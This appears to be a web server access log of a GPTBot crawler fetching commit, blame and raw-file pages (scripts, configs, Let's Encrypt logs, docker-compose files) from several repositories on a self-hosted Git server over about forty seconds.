"/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument" [Client 74.7.227.38] [Length 9869] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument" -[17/Feb/2026:14:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11235] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts" -[17/Feb/2026:14:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/mail_contact.py" [Client 74.7.227.38] [Length 3922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/mail_contact.py" -[17/Feb/2026:14:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/update_status.py" -[17/Feb/2026:14:09:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/update_status.py" [Client 74.7.227.38] [Length 12477] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/update_status.py" -[17/Feb/2026:14:09:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/mail_contact.py" [Client 74.7.227.38] [Length 18812] [Gzip 9.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/mail_contact.py" -[17/Feb/2026:14:09:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json" [Client 74.7.227.38] [Length 10713] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json" -[17/Feb/2026:14:09:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json" [Client 74.7.227.38] [Length 452] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json" -[17/Feb/2026:14:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts" -[17/Feb/2026:14:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 15272] [Gzip 8.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh" -[17/Feb/2026:14:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 3718] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh" -[17/Feb/2026:14:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 31287] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" -[17/Feb/2026:14:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 38749] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" -[17/Feb/2026:14:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 33621] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" -[17/Feb/2026:14:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 23719] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" -[17/Feb/2026:14:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 10957] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" -[17/Feb/2026:14:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 35827] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" -[17/Feb/2026:14:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 33429] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" -[17/Feb/2026:14:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 9952] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:14:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 10136] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log" -[17/Feb/2026:14:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:14:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:14:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 9936] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:14:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 9936] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:14:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 9934] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:14:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 9936] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:14:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 9936] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:14:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 9944] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:14:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 9942] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:14:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:14:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 50188] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:14:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 42638] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:14:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 36011] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:14:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 39264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:14:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 22656] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:14:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 39193] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:14:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 9953] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:14:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 9909] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host" -[17/Feb/2026:14:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 9940] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log" -[17/Feb/2026:14:09:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log" -[17/Feb/2026:14:09:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log" -[17/Feb/2026:14:09:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 10125] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host" -[17/Feb/2026:14:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11898] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup" -[17/Feb/2026:14:09:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 387788] [Gzip 16.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0" -[17/Feb/2026:14:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 15243] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" -[17/Feb/2026:14:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 15250] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?show-outdated=&style=split&whitespace=show-all" -[17/Feb/2026:14:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 15245] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" -[17/Feb/2026:14:09:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 86383] [Gzip 15.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" -[17/Feb/2026:14:09:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 51967] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" -[17/Feb/2026:14:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 212896] [Gzip 13.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8" -[17/Feb/2026:14:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 15244] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" -[17/Feb/2026:14:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11965] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" -[17/Feb/2026:14:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2" [Client 74.7.227.38] [Length 20220] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" -[17/Feb/2026:14:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml" -[17/Feb/2026:14:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr 